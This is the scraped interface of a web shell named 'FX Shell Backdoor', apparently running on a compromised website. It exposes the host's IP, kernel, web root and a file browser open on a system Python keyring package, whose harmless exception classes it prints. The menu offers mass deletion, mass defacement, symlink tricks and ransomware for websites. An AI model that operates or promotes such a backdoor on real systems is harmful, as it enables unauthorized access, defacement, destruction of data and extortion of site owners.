FX Shell Backdoor
Home
Tools
Mass Delete
Mass Deface
Symlink
About
Website : vivehg.com
Ip Address : 172.31.2.149
Port : 443
Kernel : Linux 52-72-122-155.cprapid.com 5.15.0-1084-aws #91~20.04.1-Ubuntu SMP Fri May 2 06:59:36 UTC 2025 x86_64
Protokol : HTTP/1.1
Save Data :
Koneksi :
Server : Apache
Root : /home/vivehg/public_html
G-Interface : CGI/1.1
R-Method : GET
Browser : Lainnya
Version Shell : 1.0 (Release candidate)
Author : FierzaXploit/Mr.MF33
Type
Name
options
PATH :
/
lib
/
python3
/
dist-packages
/
keyring
/
Upload
Buat File
Buat Folder
Buat Ransomweb
import sys __metaclass__ = type class KeyringError(Exception): """Base class for exceptions in keyring """ class PasswordSetError(KeyringError): """Raised when the password can't be set. """ class PasswordDeleteError(KeyringError): """Raised when the password can't be deleted. """ class InitError(KeyringError): """Raised when the keyring could not be initialised """ class KeyringLocked(KeyringError): """Raised when the keyring failed unlocking """ class NoKeyringError(KeyringError, RuntimeError): """Raised when there is no keyring backend """ class ExceptionRaisedContext: """ An exception-trapping context that indicates whether an exception was raised. """ def __init__(self, ExpectedException=Exception): self.ExpectedException = ExpectedException self.exc_info = None def __enter__(self): self.exc_info = object.__new__(ExceptionInfo) return self.exc_info def __exit__(self, *exc_info): self.exc_info.__init__(*exc_info) return self.exc_info.type and issubclass( self.exc_info.type, self.ExpectedException) class ExceptionInfo: def __init__(self, *info): if not info: info = sys.exc_info() self.type, self.value, _ = info def __bool__(self): """ Return True if an exception occurred """ return bool(self.type) __nonzero__ = __bool__
__pycache__
Choose...
Rename
Delete
Now
backends
Choose...
Rename
Delete
Now
tests
Choose...
Rename
Delete
Now
util
Choose...
Rename
Delete
Now
__init__.py
Choose...
Edit
Rename
Delete
Now
__main__.py
Choose...
Edit
Rename
Delete
Now
__pycache__
Choose...
Edit
Rename
Delete
Now
backend.py
Choose...
Edit
Rename
Delete
Now
backends
Choose...
Edit
Rename
Delete
Now
cli.py
Choose...
Edit
Rename
Delete
Now
core.py
Choose...
Edit
Rename
Delete
Now
credentials.py
Choose...
Edit
Rename
Delete
Now
devpi_client.py
Choose...
Edit
Rename
Delete
Now
errors.py
Choose...
Edit
Rename
Delete
Now
http.py
Choose...
Edit
Rename
Delete
Now
py27compat.py
Choose...
Edit
Rename
Delete
Now
py32compat.py
Choose...
Edit
Rename
Delete
Now
py33compat.py
Choose...
Edit
Rename
Delete
Now
tests
Choose...
Edit
Rename
Delete
Now
util
Choose...
Edit
Rename
Delete
Now